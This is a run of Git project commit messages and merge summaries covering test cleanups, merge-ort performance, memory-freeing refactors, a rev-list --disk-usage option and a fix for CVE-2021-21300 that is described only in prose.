upload-pack tests: avoid a non-zero "grep" exit status
git-svn tests: rewrite brittle tests to use "--[no-]merges".
git svn mergeinfo tests: refactor "test -z" to use test_must_be_empty
git svn mergeinfo tests: modernize redirection & quoting style
cache-tree tests: explicitly test HEAD and index differences
cache-tree tests: use a sub-shell with less indirection
cache-tree tests: remove unused $2 parameter
cache-tree tests: refactor for modern test style
diffcore_rename() had some code to avoid having destination paths that
already had an exact rename detected from being re-checked for other
renames. Source paths, however, were re-checked because we wanted to
allow the possibility of detecting copies. But if copy detection isn't
turned on, then this merely amounts to attempting to find a
better-than-exact match, which naturally ends up being an expensive
no-op. In particular, copy detection is never turned on by the merge
machinery.
For the testcases mentioned in commit 557ac0350d ("merge-ort: begin
performance work; instrument with trace2_region_* calls", 2020-10-28),
this change improves the performance as follows:
Before After
no-renames: 14.263 s ± 0.053 s 14.119 s ± 0.101 s
mega-renames: 5504.231 s ± 5.150 s 1802.044 s ± 0.828 s
just-one-mega: 158.534 s ± 0.498 s 51.391 s ± 0.028 s
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add assertions of the correct parameter count of various functions, in
particularly the wrappers for the shell "test" built-in.
In an earlier commit we fixed a bug with an incorrect number of
arguments being passed to "test_path_is_{file,missing}". Let's also
guard other similar functions from the same sort of misuse.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the optional "diagnostics" parameter of the
test_path_is_{file,dir,missing} functions.
We have a lot of uses of these functions, but the only legitimate use
of the diagnostics parameter is from when the functions themselves
were introduced in 2caf20c52b (test-lib: user-friendly alternatives
to test [-d|-f|-e], 2010-08-10).
But as the the rest of this diff demonstrates its presence did more to
silently introduce bugs in our tests. Fix such bugs in the tests added
in ae4e89e549 (gc: add --keep-largest-pack option, 2018-04-15), and
c04ba51739 (t6046: testcases checking whether updates can be skipped
in a merge, 2018-04-19).
Let's also assert that those functions are called with exactly one
parameter, a follow-up commit will add similar asserts to other
functions in test-lib-functions.sh that we didn't have existing misuse
of.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename the "diff-lib" to "lib-diff". With this rename and preceding
commits there is no remaining t/*lib* which doesn't follow the
convention of being called t/lib-*.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* maint-2.22:
Git 2.22.5
Git 2.21.4
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.21:
Git 2.21.4
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.20:
Git 2.20.5
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.19:
Git 2.19.6
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.18:
Git 2.18.5
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
* maint-2.17:
Git 2.17.6
unpack_trees(): start with a fresh lstat cache
run-command: invalidate lstat cache after a command finished
checkout: fix bug that makes checkout follow symlinks in leading path
In the previous commit, we intercepted calls to `rmdir()` to invalidate
the lstat cache in the successful case, so that the lstat cache could
not have the idea that a directory exists where there is none.
The same situation can arise, of course, when a separate process is
spawned (most notably, this is the case in `submodule_move_head()`).
Obviously, we cannot know whether a directory was removed in that
process, therefore we must invalidate the lstat cache afterwards.
Note: in contrast to `lstat_cache_aware_rmdir()`, we invalidate the
lstat cache even in case of an error: the process might have removed a
directory and still have failed afterwards.
Co-authored-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Before checking out a file, we have to confirm that all of its leading
components are real existing directories. And to reduce the number of
lstat() calls in this process, we cache the last leading path known to
contain only directories. However, when a path collision occurs (e.g.
when checking out case-sensitive files in case-insensitive file
systems), a cached path might have its file type changed on disk,
leaving the cache on an invalid state. Normally, this doesn't bring
any bad consequences as we usually check out files in index order, and
therefore, by the time the cached path becomes outdated, we no longer
need it anyway (because all files in that directory would have already
been written).
But, there are some users of the checkout machinery that do not always
follow the index order. In particular: checkout-index writes the paths
in the same order that they appear on the CLI (or stdin); and the
delayed checkout feature -- used when a long-running filter process
replies with "status=delayed" -- postpones the checkout of some entries,
thus modifying the checkout order.
When we have to check out an out-of-order entry and the lstat() cache is
invalid (due to a previous path collision), checkout_entry() may end up
using the invalid data and thrusting that the leading components are
real directories when, in reality, they are not. In the best case
scenario, where the directory was replaced by a regular file, the user
will get an error: "fatal: unable to create file 'foo/bar': Not a
directory". But if the directory was replaced by a symlink, checkout
could actually end up following the symlink and writing the file at a
wrong place, even outside the repository. Since delayed checkout is
affected by this bug, it could be used by an attacker to write
arbitrary files during the clone of a maliciously crafted repository.
Some candidate solutions considered were to disable the lstat() cache
during unordered checkouts or sort the entries before passing them to
the checkout machinery. But both ideas include some performance penalty
and they don't future-proof the code against new unordered use cases.
Instead, we now manually reset the lstat cache whenever we successfully
remove a directory. Note: We are not even checking whether the directory
was the same as the lstat cache points to because we might face a
scenario where the paths refer to the same location but differ due to
case folding, precomposed UTF-8 issues, or the presence of `..`
components in the path. Two regression tests, with case-collisions and
utf8-collisions, are also added for both checkout-index and delayed
checkout.
Note: to make the previously mentioned clone attack unfeasible, it would
be sufficient to reset the lstat cache only after the remove_subtree()
call inside checkout_entry(). This is the place where we would remove a
directory whose path collides with the path of another entry that we are
currently trying to check out (possibly a symlink). However, in the
interest of a thorough fix that does not leave Git open to
similar-but-not-identical attack vectors, we decided to intercept
all `rmdir()` calls in one fell swoop.
This addresses CVE-2021-21300.
Co-authored-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
The "ort" merge strategy.
* en/merge-ort-perf:
merge-ort: begin performance work; instrument with trace2_region_* calls
merge-ort: ignore the directory rename split conflict for now
merge-ort: fix massive leak
ORT merge strategy learns to infer "renamed directory" while
merging.
* en/ort-directory-rename:
merge-ort: fix a directory rename detection bug
merge-ort: process_renames() now needs more defensiveness
merge-ort: implement apply_directory_rename_modifications()
merge-ort: add a new toplevel_dir field
merge-ort: implement handle_path_level_conflicts()
merge-ort: implement check_for_directory_rename()
merge-ort: implement apply_dir_rename() and check_dir_renamed()
merge-ort: implement compute_collisions()
merge-ort: modify collect_renames() for directory rename handling
merge-ort: implement handle_directory_level_conflicts()
merge-ort: implement compute_rename_counts()
merge-ort: copy get_renamed_dir_portion() from merge-recursive.c
merge-ort: add outline of get_provisional_directory_renames()
merge-ort: add outline for computing directory renames
merge-ort: collect which directories are removed in dirs_removed
merge-ort: initialize and free new directory rename data structures
merge-ort: add new data structures for directory rename detection
Currently invalid boolean config values return messages about 'bad
numeric', which is slightly misleading when the error was due to a
boolean value. We can improve the developer experience by returning a
boolean error message when we know the value is neither a bool text or
int.
before with an invalid boolean value of `non-boolean`, its unclear what
numeric is referring to:
fatal: bad numeric config value 'non-boolean' for 'commit.gpgsign': invalid unit
now the error message mentions `non-boolean` is a bad boolean value:
fatal: bad boolean config value 'non-boolean' for 'commit.gpgsign'
Signed-off-by: Andrew Klotz <agc.klotz@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, we should use "test"
rather than "[ ... ]" in shell scripts, so let's replace the
"[ ... ]" with "test" in the t7001 test script.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change from old style to current style by taking advantage of
here-docs instead of echo commands.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modern practice is to avoid multiple commands per line, and
instead place each command on its own line.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use `>` rather than `touch` to create an empty file when the
timestamp isn't relevant to the test.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid using `cd` outside of subshells since, if the test fails,
there is no guarantee that the current working directory is the
expected one, which may cause subsequent tests to run in the wrong
directory.
While at it, make some other tests more concise by replacing
simple subshells with `git -C`.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to Documentation/CodingGuidelines, there should be no
whitespace after redirect operators. So, we should remove these
whitespaces after redirect operators.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some test use an old style for formatting subshells:
(command &&
...
Update them to the modern style:
(
command &&
...
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests use a deprecated style in which there are unnecessary
blank lines after the opening quote of the test body and before the
closing quote. So we should remove these unnecessary blank lines.
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some tests in this script are formatted using a very old style:
test_expect_success \
'title' \
'body line 1 &&
body line 2'
Update the formatting to the modern style:
test_expect_success 'title' '
body line 1 &&
body line 2
'
Signed-off-by: Shubham Verma <shubhunic@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Save sizeof(const char *) bytes by declaring ref_stash as an array
instead of having a redundant pointer to an array.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Modernize the script by doing file content comparisons using test_cmp()
instead of `test x = "$(cat file)"`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to modernize the test script, replace `test -s` with
test_file_not_empty(), which provides better diagnostic output in the
case of failure.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If a git command in a nested command substitution fails, it will be
silently ignored since only the return code of the outer command
substitutions is reported. Factor out nested command substitutions so
that the error codes of those commands are reported.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to modernize the tests, move commands that currently run
outside of test cases into a test case. Where possible, clean up files
that are produced using test_when_finished() but in the case where files
persist over multiple test cases, create a new test case to perform
cleanup.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For shell scripts, the usual convention is for there to be no space
after redirection operators, (e.g. `>file`, not `> file`). Remove these
spaces wherever they appear.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, the options for the `list` and `show` subcommands are just
listed as `<options>`. This seems to imply, from a cursory glance at the
summary, that they take the stash options listed below. However, reading
more carefully, we see that they take log options and diff options
respectively.
Make it more obvious that they take log and diff options by explicitly
stating this in the subcommand summary.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can sometimes be useful to see which refs are contributing to the
overall repository size (e.g., does some branch have a bunch of objects
not found elsewhere in history, which indicates that deleting it would
shrink the size of a clone).
You can find that out by generating a list of objects, getting their
sizes from cat-file, and then summing them, like:
git rev-list --objects --no-object-names main..branch
git cat-file --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
Though note that the caveats from git-cat-file(1) apply here. We "blame"
base objects more than their deltas, even though the relationship could
easily be flipped. Still, it can be a useful rough measure.
But one problem is that it's slow to run. Teaching rev-list to sum up
the sizes can be much faster for two reasons:
1. It skips all of the piping of object names and sizes.
2. If bitmaps are in use, for objects that are in the
bitmapped packfile we can skip the oid_object_info()
lookup entirely, and just ask the revindex for the
on-disk size.
This patch implements a --disk-usage option which produces the same
answer in a fraction of the time. Here are some timings using a clone of
torvalds/linux:
[rev-list piped to cat-file, no bitmaps]
$ time git rev-list --objects --no-object-names --all |
git cat-file --buffer --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
1459938510
real 0m29.635s
user 0m38.003s
sys 0m1.093s
[internal, no bitmaps]
$ time git rev-list --disk-usage --objects --all
1459938510
real 0m31.262s
user 0m30.885s
sys 0m0.376s
Even though the wall-clock time is slightly worse due to parallelism,
notice the CPU savings between the two. We saved 21% of the CPU just by
avoiding the pipes.
But the real win is with bitmaps. If we use them without the new option:
[rev-list piped to cat-file, bitmaps]
$ time git rev-list --objects --no-object-names --all --use-bitmap-index |
git cat-file --batch-check='%(objectsize:disk)' |
perl -lne '$total += $_; END { print $total }'
1459938510
real 0m6.244s
user 0m8.452s
sys 0m0.311s
then we're faster to generate the list of objects, but we still spend a
lot of time piping and looking things up. But if we do both together:
[internal, bitmaps]
$ time git rev-list --disk-usage --objects --all --use-bitmap-index
1459938510
real 0m0.219s
user 0m0.169s
sys 0m0.049s
then we get the same answer much faster.
For "--all", that answer will correspond closely to "du objects/pack",
of course. But we're actually checking reachability here, so we're still
fast when we ask for more interesting things:
$ time git rev-list --disk-usage --use-bitmap-index v5.0..v5.10
374798628
real 0m0.429s
user 0m0.356s
sys 0m0.072s
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When `gc.writeCommitGraph = true`, it is possible that the commit-graph
is _still_ not written: replace objects, grafts and shallow repositories
are incompatible with the commit-graph feature.
Under such circumstances, we need to indicate to the user why the
commit-graph was not written instead of staying silent about it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Whenever a user runs `git reflog expire --stale-fix`, the most likely
reason is that their repository is at least _somewhat_ corrupt. Which
means that it is more than just possible that some objects are missing.
If that is the case, that can currently let the command abort through
the phase where it tries to mark all reachable objects.
Instead of adding insult to injury, let's be gentle and continue as best
as we can in such a scenario, simply by ignoring the missing objects and
moving on.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix a memory leak in 296d4a94e7 (diff: add -I<regex> that ignores
matching changes, 2020-10-20) by freeing the memory it allocates in
the newly introduced diff_free(). See the previous commit for details
on that.
This memory leak was intentionally introduced in 296d4a94e7, see the
discussion on a previous iteration of it in
https://lore.kernel.org/git/xmqqeelycajx.fsf@gitster.c.googlers.com/
At that time freeing the memory was somewhat tedious, but since it
isn't anymore with the newly introduced diff_free() let's use it.
Let's retain the pattern for diff_free_file() and add a
diff_free_ignore_regex(), even though (unlike "diff_free_file") we
don't need to call it elsewhere. I think this'll make for more
readable code than gradually accumulating a giant diff_free()
function, sharing "int i" across unrelated code etc.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a diff_free() function to free anything we may have allocated in
the "diff_options" struct, and the ability to make calling it a noop
by setting "no_free" in "diff_options".
This is required because when e.g. "git diff" is run we'll allocate
things in that struct, use the diff machinery once, and then exit.
But if we run e.g. "git log -p" we're going to re-use what we
allocated across multiple diff_flush() calls, and only want to free
things at the end.
We've thus ended up with features like the recently added "diff -I"[1]
where we'll leak memory. As it turns out it could have simply used the
pattern established in 6ea57703f6 (log: prepare log/log-tree to reuse
the diffopt.close_file attribute, 2016-06-22).
Manually adding more such flags to things log_tree_commit() every time
we need to allocate something would be tedious. Let's instead move
that fclose() code it to a new diff_free(), in anticipation of freeing
more things in that function in follow-up commits.
Some functions such as log_tree_commit() need an idiom of optionally
retaining a previous "no_free", as they may either free the memory
themselves, or their caller may do so. I'm keeping that idiom in
log_show_early() for good measure, even though I don't think it's
currently called in this manner. It also gets passed an existing
"struct rev_info", so future callers may want to set the "no_free"
flag.
This change is a bit hard to read because while the freeing pattern
we're introducing isn't unusual, the "file" member is a special
snowflake. We usually don't want to fclose() it. This is because
"file" is usually stdout, in which case we don't want to fclose()
it. We only want to opt-in to closing it when we e.g. open a file on
the filesystem. Thus the opt-in "close_file" flag.
So the API in general just needs a "no_free" flag to defer freeing,
but the "file" member still needs its "close_file" flag. This is made
more confusing because while refactoring this code we could replace
some "close_file=0" with "no_free=1", whereas others need to set both
flags.
This is because there were some cases where an existing "close_file=0"
meant "let's defer deallocation", and others where it meant "we don't
want to close this file handle at all".
1. 296d4a94e7 (diff: add -I<regex> that ignores matching changes,
2020-10-20)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a follow-up to d162b25f95 (tests: remove support for
GIT_TEST_GETTEXT_POISON, 2021-01-20) remove most uses of test_i18ncmp
via a simple s/test_i18ncmp/test_cmp/g search-replacement.
I'm leaving t6300-for-each-ref.sh out due to a conflict with in-flight
changes between "master" and "seen", as well as the prerequisite
itself due to other changes between "master" and "next/seen" which add
new test_i18ncmp uses.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the last uses of the C_LOCALE_OUTPUT prerequisite as well as
the prerequisite itself. This is a follow-up to d162b25f95 (tests:
remove support for GIT_TEST_GETTEXT_POISON, 2021-01-20), as well as
the preceding commit where we removed the simpler uses of
C_LOCALE_OUTPUT.
Here I'm slightly refactoring a test added in 21e5ad50fc (safecrlf:
Add mechanism to warn about irreversible crlf conversions,
2008-02-06), as well as getting rid of another "test_have_prereq
C_LOCALE_OUTPUT" use.
I'm not leaving the prerequisite itself in place for in-flight changes
as there currently are none that introduce new tests that rely on it,
and because C_LOCALE_OUTPUT is currently a noop on the master branch
we likely won't have any new submissions that use it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As a follow-up to d162b25f95 (tests: remove support for
GIT_TEST_GETTEXT_POISON, 2021-01-20) remove those uses of the now
always true C_LOCALE_OUTPUT prerequisite from those tests which
declare it as an argument to test_expect_{success,failure}.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Follow-up my 73c01d25fe (tests: remove uses of
GIT_TEST_GETTEXT_POISON=false, 2021-01-20) by removing the last uses
of GIT_TEST_GETTEXT_POISON=*.
These assignments were part of branch that was in-flight at the time
of the gettext poison removal. See 466f94ec45 (Merge branch
'ab/detox-gettext-tests', 2021-02-10) and c7d6d419b0 (Merge branch
'ab/mktag', 2021-01-25) for the merging of the two branches.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git help gc` contains this snippet:
"[...] it will keep [..] objects referenced by the index,
remote-tracking branches, notes saved by git notes under refs/notes/"
I had interpreted that as saying that the objects that notes were
attached to are kept, but that is not the case. Let's clarify the
documentation by moving out the part about git notes to a separate
sentence.
Signed-off-by: Martin von Zweigbergk <martinvonz@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we have a multiply signed commit, we need to remove the signature
in the header before verifying the object, since the trailing signature
will not be over both pieces of data. Do so, and verify that we
validate the signature appropriately.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we parse a signature in the ref-filter code, we continually
increment the buffer pointer. Hoist the signature parsing above the
blank line delimiting headers and body so we can find the signature when
using a header to sign the buffer.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently only commits are signed with headers. However, in the future,
we'll also sign tags with headers as well. Let's refactor out a
function called parse_buffer_signed_by_header which does exactly that.
In addition, since we'll want to sign things other than commits this
way, let's call the function sign_with_header instead of do_sign_commit.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a function which parses a buffer with a signature at the end,
parse_signature, and this function is used for signed tags. However,
we'll need to store values for multiple algorithms, and we'll do this by
using a header for the non-default algorithm.
Adjust the parse_signature interface to store the parsed data in two
strbufs and turn the existing function into parse_signed_buffer. The
latter is still used in places where we know we always have a signed
buffer, such as push certs.
Adjust all the callers to deal with this new interface.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The version of Ubuntu Linux used by default at GitHub Actions CI
has been updated to one that lack coccinelle; until it gets fixed,
work it around by sticking to the previous release (18.04).
* tb/ci-run-cocci-with-18.04:
.github/workflows/main.yml: run static-analysis on bionic
Get rid of "GETTEXT_POISON" support altogether, which may or may
not be controversial.
* ab/detox-gettext-tests:
tests: remove uses of GIT_TEST_GETTEXT_POISON=false
tests: remove support for GIT_TEST_GETTEXT_POISON
ci: remove GETTEXT_POISON jobs
Update support for invalid UTF-8 in PCRE2.
* ab/grep-pcre-invalid-utf8:
grep/pcre2: better support invalid UTF-8 haystacks
grep/pcre2 tests: don't rely on invalid UTF-8 data test
The support for deprecated PCRE1 library has been dropped.
* ab/retire-pcre1:
Remove support for v1 of the PCRE library
config.mak.uname: remove redundant NO_LIBPCRE1_JIT flag
Some pretty-format specifiers do not need the data in commit object
(e.g. "%H"), but we were over-eager to load and parse it, which has
been made even lazier.
* jk/pretty-lazy-load-commit:
pretty: lazy-load commit data when expanding user-format
Cleaning various codepaths up.
* ds/more-index-cleanups:
t1092: test interesting sparse-checkout scenarios
test-lib: test_region looks for trace2 regions
sparse-checkout: load sparse-checkout patterns
name-hash: use trace2 regions for init
repository: add repo reference to index_state
fsmonitor: de-duplicate BUG()s around dirty bits
cache-tree: extract subtree_pos()
cache-tree: simplify verify_cache() prototype
cache-tree: clean up cache_tree_update()
When "git rebase -i" processes "fixup" insn, there is no reason to
clean up the commit log message, but we did the usual stripspace
processing. This has been corrected.
* js/rebase-i-commit-cleanup-fix:
rebase -i: do leave commit message intact in fixup! chains
Code clean-up.
* jk/t0000-cleanups:
t0000: consistently use single quotes for outer tests
t0000: run cleaning test inside sub-test
t0000: run prereq tests inside sub-test
t0000: keep clean-up tests together
Lose the debugging aid that may have been useful in the past, but
no longer is, in the "grep" codepaths.
* ab/lose-grep-debug:
grep/log: remove hidden --debug and --grep-debug options
Code clean-up to ensure our use of hashtables using object names as
keys use the "struct object_id" objects, not the raw hash values.
* jk/use-oid-pos:
oid_pos(): access table through const pointers
hash_pos(): convert to oid_pos()
rerere: use strmap to store rerere directories
rerere: tighten rr-cache dirname check
rerere: check dirname format while iterating rr_cache directory
commit_graft_pos(): take an oid instead of a bare hash
This behavior of git-rev-parse is observed since git 1.8.3.1
at least(*), and likely earlier versions.
At least one git-reliant project in-the-wild relies on this
current behavior of git-rev-parse being able to handle multiple
--since= arguments without squeezing identical results together.
So add a test to prevent the potential for regression in
downstream projects.
(*) 1.8.3.1 the version packaged for CentOS 7.x
Signed-off-by: Eric Wong <e@80x24.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Sort the lines starting with "/", the only out-of-place line was added
along with most of the file in 614f4f0f35 (Fix the remaining tests
that failed with core.autocrlf=true, 2017-05-09).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move a function added to test-lib-functions.sh in ea047a8eb4 (t5310:
factor out bitmap traversal comparison, 2020-02-14) into a new
lib-bitmap.sh.
The test-lib-functions.sh file should be for functions that are widely
used across the test suite, if something's only used by a few tests it
makes more sense to have it in a lib-*.sh file.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename gitweb-lib.sh to lib-gitweb.sh for consistency with other test
library files.
When it was introduced in 05526071cb (gitweb: split test suite into
library and tests, 2009-08-27) this naming pattern was more
common.
Since then all but one other such library which didn't start with
"lib-*.sh" such as t6000lib.sh has been been renamed, see
e.g. 9d488eb40e (Move t6000lib.sh to lib-*, 2010-05-07).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rename the recently introduced test-bundle-functions.sh to be
consistent with other lib-*.sh files, which is the convention for
these sorts of shared test library functions.
The new test-bundle-functions.sh was introduced in 9901164d81 (test:
add helper functions for git-bundle, 2021-01-11). It was the only
test-*.sh of this nature.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since d5cfd142ec (tests: teach the test-tool to generate NUL bytes
and use it, 2019-02-14) the generate_zero_bytes() functions has been a
thin wrapper for "test-tool genzeros". Let's have its only user call
that directly instead.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move the test_set_index_version() function to its only user. This
function has only been used in one place since its addition in
5d9fc888b4 (test-lib: allow setting the index format version,
2014-02-23). Let's have that test script define it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change two uses of "error" in test-lib-functions.sh to "BUG".
In the first instance in "test_cmp_rev" the author of the "BUG"
function added in [1] had another in-flight patch adding this in [2],
and the two were never consolidated.
In the second case in "test_atexit" added in [3] that we could have
instead used "BUG" appears to have been missed.
1. 165293af3c (tests: send "bug in the test script" errors to the
script's stderr, 2018-11-19)
2. 30d0b6dccb (test-lib-functions: make 'test_cmp_rev' more
informative on failure, 2018-11-19)
3. 900721e15c (test-lib: introduce 'test_atexit', 2019-03-13)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the check_var_migration() migration helper. This was added back
in [1], [2] and [3] to warn users to migrate from e.g. the
"GIT_FSMONITOR_TEST" name to "GIT_TEST_FSMONITOR".
I daresay that having been warning about this since late 2018 (or
v2.20.0) was sufficient time to give everyone interested a heads-up
about moving to the new names.
I don't see the need for going through the "do this later" codepath
anticipated in [1], let's just remove this instead.
1. 4cb54d0aa8 (fsmonitor: update GIT_TEST_FSMONITOR support,
2018-09-18)
2. 1f357b045b (read-cache: update TEST_GIT_INDEX_VERSION support,
2018-09-18)
3. 5765d97b71 (preload-index: update GIT_FORCE_PRELOAD_TEST support,
2018-09-18)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When trying to find a .mailmap file, we will always look for it in the
current directory. This makes sense in a repository with a working tree,
since we'd always go to the toplevel directory at startup. But for a
bare repository, it can be confusing. With an option like --git-dir (or
$GIT_DIR in the environment), we don't chdir at all, and we'd read
.mailmap from whatever directory you happened to be in before starting
Git.
(Note that --git-dir without specifying a working tree historically
means "the current directory is the root of the working tree", but most
bare repositories will have core.bare set these days, meaning they will
realize there is no working tree at all).
The documentation for gitmailmap(5) says:
If the file `.mailmap` exists at the toplevel of the repository[...]
which likewise reinforces the notion that we are looking in the working
tree.
This patch prevents us from looking for such a file when we're in a bare
repository. This does break something that used to work:
cd bare.git
git cat-file blob HEAD:.mailmap >.mailmap
git shortlog
But that was never advertised in the documentation. And these days we
have mailmap.blob (which defaults to HEAD:.mailmap) to do the same thing
in a much cleaner way.
However, there's one more interesting case: we might not have a
repository at all! The git-shortlog command can be run with git-log
output fed on its stdin, and it will apply the mailmap. In that case, it
probably does make sense to read .mailmap from the current directory.
This patch will continue to do so.
That leads to one even weirder case: if you run git-shortlog to process
stdin, the input _could_ be from a different repository entirely. Should
we respect the in-tree .mailmap then? Probably yes. Whatever the source
of the input, if shortlog is running in a repository, the documentation
claims that we'd read the .mailmap from its top-level (and of course
it's reasonably likely that it _is_ from the same repo, and the user
just preferred to run git-log and git-shortlog separately for whatever
reason).
The included test covers these cases, and we now document the "no repo"
case explicitly.
We also add a test that confirms we find a top-level ".mailmap" even
when we start in a subdirectory of the working tree. This worked both
before and after this commit, but we never tested it explicitly (it
works because we always chdir to the top-level of the working tree if
there is one).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 7b35efd734 (fsck_walk(): optionally name objects on the go,
2016-07-17), the `fsck` machinery learned to optionally name the
objects, so that it is easier to see what part of the repository is in a
bad shape, say, when objects are missing.
To save on complexity, this machinery uses a parser to determine the
name of a parent given a commit's name: any `~<n>` suffix is parsed and
the parent's name is formed from the prefix together with `~<n+1>`.
However, this parser has a bug: if it finds a suffix `<n>` that is _not_
`~<n>`, it will mistake the empty string for the prefix and `<n>` for
the generation number. In other words, it will generate a name of the
form `~<bogus-number>`.
Let's fix this.
